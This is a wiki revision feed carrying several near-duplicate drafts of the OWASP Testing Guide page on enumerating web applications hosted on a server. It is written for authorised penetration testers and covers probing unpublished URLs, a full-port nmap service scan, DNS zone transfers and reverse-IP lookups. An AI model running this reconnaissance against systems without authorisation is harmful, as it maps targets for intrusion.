If you don’t know a name server, you may look up ''whois'' information about the given IP address, and try to contact the name servers listed by whois, and request a zone transfer as said before.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;u&amp;gt;DNS inverse queries&amp;lt;/u&amp;gt; &amp;lt;br&amp;gt;&lt;br /&gt;
This process is similar to the previous but relies on inverse (PTR) DNS records. Rather than requesting a zone transfer, try setting the record type to PTR and issue a query on the given IP address. If you are lucky, you may get back a DNS name entry. This technique relies on the existence of IP-to-symbolic name maps, which is not granted.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;u&amp;gt;Web-based DNS searches&amp;lt;/u&amp;gt; &amp;lt;br&amp;gt;&lt;br /&gt;
This kind of search is akin to DNS zone transfer, but relies on web-based services which allow to perform name-based searched on DNS. One such a service is the ''Netcraft Search DNS'' service, available at http://searchdns.netcraft.com/?host. You may query for a list of names belonging to your domain of choice, such as ''example.com''. Then you will check whether the names you obtained are pertaining to the target you are examining.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;u&amp;gt;Reverse-IP services&amp;lt;/u&amp;gt; &amp;lt;br&amp;gt;&lt;br /&gt;
Reverse-IP services are similar to DNS inverse queries, with the difference that you query a web-based application instead of a name server. There is a number of such services available. Since they tend to return partial (and often different) results, it is better to use multiple services to obtain a more comprehensive analysis.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
''Domain tools reverse IP'': http://www.domaintools.com/reverse-ip/ &amp;lt;br&amp;gt;&lt;br /&gt;
(requires free membership) &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''MSN search'': http://search.msn.com &amp;lt;br&amp;gt;&lt;br /&gt;
syntax: &amp;quot;ip:x.x.x.x&amp;quot; (without the quotes) &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''Webhosting info'': http://whois.webhosting.info/ &amp;lt;br&amp;gt; &lt;br /&gt;
syntax: http://whois.webhosting.info/x.x.x.x &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''DNSstuff'': http://www.dnsstuff.com/ &amp;lt;br&amp;gt;&lt;br /&gt;
(multiple services available) &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
http://net-square.com/msnpawn/index.shtml &amp;lt;br&amp;gt;&lt;br /&gt;
(multiple queries on  domains and IP addresses, requires installation) &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''tomDNS'': http://www.tomdns.net/ &amp;lt;br&amp;gt;&lt;br /&gt;
(some services are still private at the time of writing) &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''SEOlogs.com'': http://www.seologs.com/ip-domains.html &amp;lt;br&amp;gt;&lt;br /&gt;
(reverse ip/domain lookup) &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;Googling&amp;lt;/u&amp;gt; &amp;lt;br&amp;gt;&lt;br /&gt;
After you have gathered the most information you can with the previous techniques, you can rely on search engines to possibly refine and increment your analysis. This may yield evidence of additional symbolic names belonging to your target, or applications accessible via non-obvious URLs.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Gray Box testing and example == &lt;br /&gt;
'''Testing for Topic X vulnerabilities:'''&amp;lt;br&amp;gt;&lt;br /&gt;
...&amp;lt;br&amp;gt;&lt;br /&gt;
'''Result Expected:'''&amp;lt;br&amp;gt;&lt;br /&gt;
...&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
== References ==&lt;br /&gt;
[1] RFC 2616 – Hypertext Transfer Protocol – HTTP 1.1 &amp;lt;br&amp;gt;&lt;br /&gt;
[2] nmap, http://www.insecure.org &amp;lt;br&amp;gt;&lt;br /&gt;
[3] Nessus Vulnerability Scanner, http://www.nessus.org &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''Whitepapers'''&amp;lt;br&amp;gt;&lt;br /&gt;
...&amp;lt;br&amp;gt;&lt;br /&gt;
'''Tools'''&amp;lt;br&amp;gt;&lt;br /&gt;
DNS lookup tools such as ''nslookup'', ''dig'' or similar. &amp;lt;br&amp;gt;&lt;br /&gt;
Port scanners (such as nmap, http://www.insecure.org) and vulnerability scanners (such as Nessus: http://www.nessus.org; wikto: http://www.sensepost.com/research/wikto/). &amp;lt;br&amp;gt;&lt;br /&gt;
Search engines (Google, and other major engines). &amp;lt;br&amp;gt;&lt;br /&gt;
Specialized DNS-related web-based search service: see text.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
{{Category:OWASP Testing Project AoC}}&lt;/div&gt;</summary>
		<author><name>Bregolin</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Enumerate_Applications_on_Webserver_(OTG-INFO-004)&amp;diff=11826</id>
		<title>Enumerate Applications on Webserver (OTG-INFO-004)</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Enumerate_Applications_on_Webserver_(OTG-INFO-004)&amp;diff=11826"/>
				<updated>2006-11-06T08:54:32Z</updated>
		
		<summary type="html">&lt;p&gt;Bregolin: /* Black Box testing and example */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[http://www.owasp.org/index.php/Web_Application_Penetration_Testing_AoC Up]]&amp;lt;br&amp;gt;&lt;br /&gt;
{{Template:OWASP Testing Guide v2}}&lt;br /&gt;
&lt;br /&gt;
== Brief Summary ==&lt;br /&gt;
A common step for testing vulnerabilities in a Web presence is to find out which particular applications are hosted on a Web Server.&amp;lt;br/&amp;gt;&lt;br /&gt;
Many different applications, in fact, have known vulnerabilities and known attack strategies than can be exploited in order to gain remote control and/or data exploitation.&amp;lt;br&amp;gt;&lt;br /&gt;
In addition to this many applications are often hosted on a particular web server without reference from the main website: this is true for internal and/or extranet website which could be misconfigured or not updated due to the perception they're used only &amp;quot;internally&amp;quot;.&amp;lt;br/&amp;gt;&lt;br /&gt;
In addition to this many application use common path for administrative interfaces which can be used to guess or bruteforce administrative passwords.&lt;br /&gt;
&lt;br /&gt;
== Description of the Issue == &lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
With the proliferation of virtual web servers, the traditional 1:1-type relationship between an IP address and a web server is loosing much of its original significance. It is not uncommon to have multiple web sites / applications whose symbolic names resolve &lt;br /&gt;
to the same IP address (and this scenario is not limited to hosting environments, but applies to ordinary corporate environments as well).&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Sometimes you, as a security professional, are given a set of IP addresses (or maybe just one) as a target to test. No other knowledge. It is arguable that this setting is more akin to a pentest-type engagement, but in any case it is expected that such an assignment would test all web applications accessible through this target (and possibly other things...). The problem is, the given IP address hosts an http service on port 80, but if you access it specifying the IP address (which is all you know) it reports &amp;quot;No web &lt;br /&gt;
server configured at this address&amp;quot; or a similar message. But that system could &amp;quot;hide&amp;quot; a bunch of web applications, associated to unrelated symbolic (DNS) names. Obviously the extent of your analysis is deeply affected by the fact that you test the applications, or you do not - because you don't notice them, or you notice only SOME of them.&lt;br /&gt;
Sometimes the target specification is richer – maybe you are handed out a list of IP addresses and their corresponding symbolic names. Nevertheless, this list might convey partial information, i.e. it could omit some symbolic names – and the client might not even being aware of that! (this is more likely to happen in large organizations).&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Other issues affecting the scope of the assessment are represented by web applications published at non-obvious URLs (e.g., http://www.example.com/some-strange-URL), which are not referenced elsewhere. This may happen either by error (due to misconfigurations), or intentionally (for example, unadvertised administrative interfaces).&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
To address these issues it is necessary to perform a web application discovery.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Black Box testing and example ==&lt;br /&gt;
'''Web application discovery''' &amp;lt;br&amp;gt;&lt;br /&gt;
Web application discovery is a process aimed at identifying web applications on given infrastructure. The latter is usually specified as a set of IP addresses (maybe a net block), but may consist also of a set of DNS symbolic names, or a mix of the two.&amp;lt;br&amp;gt;&lt;br /&gt;
This information is handed out prior to the execution of an assessment, be it a classic-style penetration test or an application-focused assessment. In both cases, unless the rules of engagement specify otherwise (e.g., “test only the application located at the URL http://www.example.com/”), the assessment should strive to be the most comprehensive in scope, i.e. it should, first of all, identify all the applications accessible through the given target. In the following we will examine a few techniques that can be employed to achieve this goal.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
There are two factors influencing how many applications are related to a given DNS name (or an IP address).&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
'''1. Different base URL''' &amp;lt;br&amp;gt;&lt;br /&gt;
The obvious entry point for a web application is ''www.example.com'', i.e. with this shorthand notation we think of the web application originating at http://www.example.com/ (the same applies for https). However, though this is the most common situation, there is nothing forcing the application to start at “/”.&amp;lt;br&amp;gt;&lt;br /&gt;
For example, the same symbolic name may be associated to three web applications such as &amp;lt;br&amp;gt;&lt;br /&gt;
http://www.example.com/url1 &amp;lt;br&amp;gt;&lt;br /&gt;
http://www.example.com/url2 &amp;lt;br&amp;gt;&lt;br /&gt;
http://www.example.com/url3 &amp;lt;br&amp;gt;&lt;br /&gt;
In this case the URL http://www.example.com/ would not be associated to a meaningful page, and the three applications would be “hidden” unless we explicitly know how to reach them, i.e. we know ''url1'', ''url2'' or ''url3''. There is usually no need to publish web applications in this way, unless you don’t want them to be accessible in a standard way, and you are prepared to inform your users about their exact location. This doesn’t mean that these applications are secret, but that their existence and location is not explicitly advertised.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
'''2. Non-standard ports''' &amp;lt;br&amp;gt;&lt;br /&gt;
While web applications usually live on port 80 (http) and 443 (https), there is nothing magic about these port numbers. In fact, web applications may be associated with arbitrary TCP ports, and can be referenced by specifying the port number as follows: http[s]://www.example.com:port/. For example, http://www.example.com:20000/.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
There is another factor affecting how many web applications are related to a given IP address.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
'''3. Virtual hosts''' &amp;lt;br&amp;gt;&lt;br /&gt;
DNS allows to associate a single IP address to one or more symbolic names. For example, the IP address ''192.168.1.100'' might be associated to DNS names ''www.example.com, helpdesk.example.com, webmail.example.com'' (actually, it is not necessary that all the names belong to the same DNS domain). This 1-to-N relationship may be reflected to serve different content by using so called virtual hosts. The information specifying the virtual host we are referring to is embedded in the HTTP 1.1 ''Host:'' header [1].&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
We would not suspect the existence of other web applications in addition to the obvious ''www.example.com'', unless we know of ''helpdesk.example.com'' and ''webmail.example.com''.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
'''Approaches to address issue 1 - non-standard URLs'''&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
There is no way to full-proof ascertain the existence of non-standard-named web applications. Being non-standard, there is no magic recipe handing them out. However, we may employ a couple of criteria which may aid in their quest.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Our first hope is that these application might be referenced by other web pages; as such, there is a chance that they have been spidered and indexed by web search engines. If we suspect the existence of such “hidden” applications on ''www.example.com'' we could, for example, do a bit of googling using the ''site'' operator and examining the result of a query for “site: www.example.com”. Among the returned URLs there could be one pointing to such a non-obvious application.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Another option is to probe for URLs which might be likely candidates for non-published applications. For example, a web mail front end might be accessible from https://www.example.com/webmail, while this URL could not be referenced anywhere (after all, employees would know where the webmail application is located, while there is no reason to tell this information to outsiders by publishing it onto the corporate web site). The same holds for administrative interfaces, which may be published at standard URLs (for example: A Tomcat administrative interface), and yet not being referenced anywhere. So, doing a bit of dictionary-style searching (or “intelligent guessing”) could yield back some results. Vulnerability scanners may help with this respect.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
'''Approaches to address issue 2 - non-standard ports'''&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Existence of web applications on non-standard ports is easy to check. A port scanner such as nmap [2] is capable of performing service recognition by means of the -sV option, and will identify http[s] services on arbitrary ports. What is required is a full scan of the whole 64k TCP port address space.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
For example, the following command will look up, with a TCP connect scan, all open ports on IP ''192.168.1.100'' and will try to determine what services are bound to them (only ''essential'' switches are shown – nmap features a broad set of options, whose discussion is out of scope).&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
''nmap –P0 –sT –sV –p1-65535 192.168.1.100''&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
It is sufficient to examine the output and looking for http or the indication of SSL-wrapped services (which should be probed to confirm they are https).&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
The same task may be performed by vulnerability scanners – but first check that your scanner of choice is able to identify http[s] services running on non-standard ports. For example, Nessus [3] is capable of identifying them on arbitrary ports (provided you instruct it to scan all the ports), and will provide – with respect to nmap – a number of tests on known web server vulnerabilities, as well as on the SSL configuration of https services. As hinted before, Nessus is also able to spot popular applications / web interfaces which could otherwise go unnoticed.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
'''Approaches to address issue 3 - virtual hosts'''&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
There is a number of techniques which may be used to identify DNS names associated to a given IP address ''x.y.z.t''.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;u&amp;gt;DNS zone transfers&amp;lt;/u&amp;gt; &amp;lt;br&amp;gt;&lt;br /&gt;
This technique is nowadays of limited usage, given the fact that zone transfers are largely not honored by DNS servers, but it is worth a try. &amp;lt;br&amp;gt;&lt;br /&gt;
First of all, we must determine the name server serving ''x.y.z.t''. Actually, matters get complicated because there could be many such servers. Maybe you know a name server because it was given as part of the target to be assessed (let it be ''dns.example.com''). You may query ''dns.example.com'' by means of tools such as ''nslookup'' or ''dig'' and, if you are lucky, you may get back a list of the DNS entries for domain ''example.com''. This will include the obvious ''www.example.com'' and the not-so-obvious ''helpdesk.example.com'' and ''webmail.example.com'' (and possibly others). Check all names returned by the zone transfer and consider all of those which are related to the target being evaluated. &amp;lt;br&amp;gt;&lt;br /&gt;
If you don’t know a name server, you may look up ''whois'' information about the given IP address, and try to contact the name servers listed by whois, and request a zone transfer as said before.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;u&amp;gt;DNS inverse queries&amp;lt;/u&amp;gt; &amp;lt;br&amp;gt;&lt;br /&gt;
This process is similar to the previous but relies on inverse (PTR) DNS records. Rather than requesting a zone transfer, try setting the record type to PTR and issue a query on the given IP address. If you are lucky, you may get back a DNS name entry. This technique relies on the existence of IP-to-symbolic name maps, which is not granted.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;u&amp;gt;Web-based DNS searches&amp;lt;/u&amp;gt; &amp;lt;br&amp;gt;&lt;br /&gt;
This kind of search is akin to DNS zone transfer, but relies on web-based services which allow to perform name-based searched on DNS. One such a service is the ''Netcraft Search DNS'' service, available at http://searchdns.netcraft.com/?host. You may query for a list of names belonging to your domain of choice, such as ''example.com''. Then you will check whether the names you obtained are pertaining to the target you are examining.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;u&amp;gt;Reverse-IP services&amp;lt;/u&amp;gt; &amp;lt;br&amp;gt;&lt;br /&gt;
Reverse-IP services are similar to DNS inverse queries, with the difference that you query a web-based application instead of a name server. There is a number of such services available. Since they tend to return partial (and often different) results, it is better to use multiple services to obtain a more comprehensive analysis.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
''Domain tools reverse IP'': http://www.domaintools.com/reverse-ip/ &amp;lt;br&amp;gt;&lt;br /&gt;
(requires free membership) &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''MSN search'': http://search.msn.com &amp;lt;br&amp;gt;&lt;br /&gt;
syntax: &amp;quot;ip:x.x.x.x&amp;quot; (without the quotes) &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''Webhosting info'': http://whois.webhosting.info/ &amp;lt;br&amp;gt; &lt;br /&gt;
syntax: http://whois.webhosting.info/x.x.x.x &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''DNSstuff'': http://www.dnsstuff.com/ &amp;lt;br&amp;gt;&lt;br /&gt;
(multiple services available) &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
http://net-square.com/msnpawn/index.shtml &amp;lt;br&amp;gt;&lt;br /&gt;
(multiple queries on  domains and IP addresses, requires installation) &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''tomDNS'': http://www.tomdns.net/ &amp;lt;br&amp;gt;&lt;br /&gt;
(some services are still private at the time of writing) &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''SEOlogs.com'': http://www.seologs.com/ip-domains.html &amp;lt;br&amp;gt;&lt;br /&gt;
(reverse ip/domain lookup) &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;Googling&amp;lt;/u&amp;gt; &amp;lt;br&amp;gt;&lt;br /&gt;
After you have gathered the most information you can with the previous techniques, you can rely on search engines to possibly refine and increment your analysis. This may yield evidence of additional symbolic names belonging to your target, or applications accessible via non-obvious URLs.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Gray Box testing and example == &lt;br /&gt;
'''Testing for Topic X vulnerabilities:'''&amp;lt;br&amp;gt;&lt;br /&gt;
...&amp;lt;br&amp;gt;&lt;br /&gt;
'''Result Expected:'''&amp;lt;br&amp;gt;&lt;br /&gt;
...&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
== References ==&lt;br /&gt;
'''Whitepapers'''&amp;lt;br&amp;gt;&lt;br /&gt;
...&amp;lt;br&amp;gt;&lt;br /&gt;
'''Tools'''&amp;lt;br&amp;gt;&lt;br /&gt;
...&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
{{Category:OWASP Testing Project AoC}}&lt;/div&gt;</summary>
		<author><name>Bregolin</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Enumerate_Applications_on_Webserver_(OTG-INFO-004)&amp;diff=11825</id>
		<title>Enumerate Applications on Webserver (OTG-INFO-004)</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Enumerate_Applications_on_Webserver_(OTG-INFO-004)&amp;diff=11825"/>
				<updated>2006-11-06T08:44:10Z</updated>
		
		<summary type="html">&lt;p&gt;Bregolin: /* Black Box testing and example */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[http://www.owasp.org/index.php/Web_Application_Penetration_Testing_AoC Up]]&amp;lt;br&amp;gt;&lt;br /&gt;
{{Template:OWASP Testing Guide v2}}&lt;br /&gt;
&lt;br /&gt;
== Brief Summary ==&lt;br /&gt;
A common step for testing vulnerabilities in a Web presence is to find out which particular applications are hosted on a Web Server.&amp;lt;br/&amp;gt;&lt;br /&gt;
Many different applications, in fact, have known vulnerabilities and known attack strategies than can be exploited in order to gain remote control and/or data exploitation.&amp;lt;br&amp;gt;&lt;br /&gt;
In addition to this many applications are often hosted on a particular web server without reference from the main website: this is true for internal and/or extranet website which could be misconfigured or not updated due to the perception they're used only &amp;quot;internally&amp;quot;.&amp;lt;br/&amp;gt;&lt;br /&gt;
In addition to this many application use common path for administrative interfaces which can be used to guess or bruteforce administrative passwords.&lt;br /&gt;
&lt;br /&gt;
== Description of the Issue == &lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
With the proliferation of virtual web servers, the traditional 1:1-type relationship between an IP address and a web server is loosing much of its original significance. It is not uncommon to have multiple web sites / applications whose symbolic names resolve &lt;br /&gt;
to the same IP address (and this scenario is not limited to hosting environments, but applies to ordinary corporate environments as well).&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Sometimes you, as a security professional, are given a set of IP addresses (or maybe just one) as a target to test. No other knowledge. It is arguable that this setting is more akin to a pentest-type engagement, but in any case it is expected that such an assignment would test all web applications accessible through this target (and possibly other things...). The problem is, the given IP address hosts an http service on port 80, but if you access it specifying the IP address (which is all you know) it reports &amp;quot;No web &lt;br /&gt;
server configured at this address&amp;quot; or a similar message. But that system could &amp;quot;hide&amp;quot; a bunch of web applications, associated to unrelated symbolic (DNS) names. Obviously the extent of your analysis is deeply affected by the fact that you test the applications, or you do not - because you don't notice them, or you notice only SOME of them.&lt;br /&gt;
Sometimes the target specification is richer – maybe you are handed out a list of IP addresses and their corresponding symbolic names. Nevertheless, this list might convey partial information, i.e. it could omit some symbolic names – and the client might not even being aware of that! (this is more likely to happen in large organizations).&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Other issues affecting the scope of the assessment are represented by web applications published at non-obvious URLs (e.g., http://www.example.com/some-strange-URL), which are not referenced elsewhere. This may happen either by error (due to misconfigurations), or intentionally (for example, unadvertised administrative interfaces).&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
To address these issues it is necessary to perform a web application discovery.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Black Box testing and example ==&lt;br /&gt;
'''Web application discovery''' &amp;lt;br&amp;gt;&lt;br /&gt;
Web application discovery is a process aimed at identifying web applications on given infrastructure. The latter is usually specified as a set of IP addresses (maybe a net block), but may consist also of a set of DNS symbolic names, or a mix of the two.&amp;lt;br&amp;gt;&lt;br /&gt;
This information is handed out prior to the execution of an assessment, be it a classic-style penetration test or an application-focused assessment. In both cases, unless the rules of engagement specify otherwise (e.g., “test only the application located at the URL http://www.example.com/”), the assessment should strive to be the most comprehensive in scope, i.e. it should, first of all, identify all the applications accessible through the given target. In the following we will examine a few techniques that can be employed to achieve this goal.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
There are two factors influencing how many applications are related to a given DNS name (or an IP address).&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
'''1. Different base URL''' &amp;lt;br&amp;gt;&lt;br /&gt;
The obvious entry point for a web application is ''www.example.com'', i.e. with this shorthand notation we think of the web application originating at http://www.example.com/ (the same applies for https). However, though this is the most common situation, there is nothing forcing the application to start at “/”.&amp;lt;br&amp;gt;&lt;br /&gt;
For example, the same symbolic name may be associated to three web applications such as &amp;lt;br&amp;gt;&lt;br /&gt;
http://www.example.com/url1 &amp;lt;br&amp;gt;&lt;br /&gt;
http://www.example.com/url2 &amp;lt;br&amp;gt;&lt;br /&gt;
http://www.example.com/url3 &amp;lt;br&amp;gt;&lt;br /&gt;
In this case the URL http://www.example.com/ would not be associated to a meaningful page, and the three applications would be “hidden” unless we explicitly know how to reach them, i.e. we know ''url1'', ''url2'' or ''url3''. There is usually no need to publish web applications in this way, unless you don’t want them to be accessible in a standard way, and you are prepared to inform your users about their exact location. This doesn’t mean that these applications are secret, but that their existence and location is not explicitly advertised.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
'''2. Non-standard ports''' &amp;lt;br&amp;gt;&lt;br /&gt;
While web applications usually live on port 80 (http) and 443 (https), there is nothing magic about these port numbers. In fact, web applications may be associated with arbitrary TCP ports, and can be referenced by specifying the port number as follows: http[s]://www.example.com:port/. For example, http://www.example.com:20000/.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
There is another factor affecting how many web applications are related to a given IP address.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
'''3. Virtual hosts''' &amp;lt;br&amp;gt;&lt;br /&gt;
DNS allows to associate a single IP address to one or more symbolic names. For example, the IP address ''192.168.1.100'' might be associated to DNS names ''www.example.com, helpdesk.example.com, webmail.example.com'' (actually, it is not necessary that all the names belong to the same DNS domain). This 1-to-N relationship may be reflected to serve different content by using so called virtual hosts. The information specifying the virtual host we are referring to is embedded in the HTTP 1.1 ''Host:'' header [1].&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
We would not suspect the existence of other web applications in addition to the obvious ''www.example.com'', unless we know of ''helpdesk.example.com'' and ''webmail.example.com''.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
'''Approaches to address issue 1 - non-standard URLs'''&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
There is no way to full-proof ascertain the existence of non-standard-named web applications. Being non-standard, there is no magic recipe handing them out. However, we may employ a couple of criteria which may aid in their quest.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Our first hope is that these application might be referenced by other web pages; as such, there is a chance that they have been spidered and indexed by web search engines. If we suspect the existence of such “hidden” applications on ''www.example.com'' we could, for example, do a bit of googling using the ''site'' operator and examining the result of a query for “site: www.example.com”. Among the returned URLs there could be one pointing to such a non-obvious application.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Another option is to probe for URLs which might be likely candidates for non-published applications. For example, a web mail front end might be accessible from https://www.example.com/webmail, while this URL could not be referenced anywhere (after all, employees would know where the webmail application is located, while there is no reason to tell this information to outsiders by publishing it onto the corporate web site). The same holds for administrative interfaces, which may be published at standard URLs (for example: a Tomcat administrative interface), and yet not being referenced anywhere. So, doing a bit of dictionary-style searching (or “intelligent guessing”) could yield back some results. Vulnerability scanners may help with this respect.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
'''Approaches to address issue 2 - non-standard ports'''&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Existence of web applications on non-standard ports is easy to check. A port scanner such as nmap [2] is capable of performing service recognition by means of the -sV option, and will identify http[s] services on arbitrary ports. What is required is a full scan of the whole 64k TCP port address space.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
For example, the following command will look up, with a TCP connect scan, all open ports on IP ''192.168.1.100'' and will try to determine what services are bound to them (only ''essential'' switches are shown – nmap features a broad set of options, whose discussion is out of scope). &amp;lt;br&amp;gt;&lt;br /&gt;
nmap –P0 –sT –sV –p1-65535 192.168.1.100&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
It is sufficient to examine the output and looking for http or https (or SSL-wrapped services).&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
The same task may be performed by vulnerability scanners – but first check that your scanner of choice is able to identify http[s] services running on non-standard ports. For example, Nessus [3] is capable of identifying them on arbitrary ports (provided you instruct it to scan all the ports), and will provide – with respect to nmap – a number of tests on known web server vulnerabilities, as well as on the SSL configuration of https services.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
'''Approaches to address issue 3 - virtual hosts'''&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
There is a number of techniques which may be used to identify DNS names associated to a given IP address ''x.y.z.t''.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;u&amp;gt;DNS zone transfers&amp;lt;/u&amp;gt; &amp;lt;br&amp;gt;&lt;br /&gt;
This technique is nowadays of limited usage, given the fact that zone transfers are largely not honored by DNS servers, but it is worth a try. &amp;lt;br&amp;gt;&lt;br /&gt;
First of all, we must determine the name server serving ''x.y.z.t''. Actually, matters get complicated because there could be many such servers. Maybe you know a name server because it was given as part of the target to be assessed (let it be ''dns.example.com''). You may query ''dns.example.com'' by means of tools such as ''nslookup'' or ''dig'' and, if you are lucky, you may get back a list of the DNS entries for domain ''example.com''. This will include the obvious ''www.example.com'' and the not-so-obvious ''helpdesk.example.com'' and ''webmail.example.com'' (and possibly others). Check all names returned by the zone transfer and consider all of those which are related to the target being evaluated. &amp;lt;br&amp;gt;&lt;br /&gt;
If you don’t know a name server, you may look up ''whois'' information about the given IP address, and try to contact the name servers listed by whois, and request a zone transfer as said before.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;u&amp;gt;DNS inverse queries&amp;lt;/u&amp;gt; &amp;lt;br&amp;gt;&lt;br /&gt;
This process is similar to the previous but relies on inverse (PTR) DNS records. Rather than requesting a zone transfer, try setting the record type to PTR and issue a query on the given IP address. If you are lucky, you may get back a DNS name entry. This technique relies on the existence of IP-to-symbolic name maps, which is not granted.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;u&amp;gt;Web-based DNS searches&amp;lt;/u&amp;gt; &amp;lt;br&amp;gt;&lt;br /&gt;
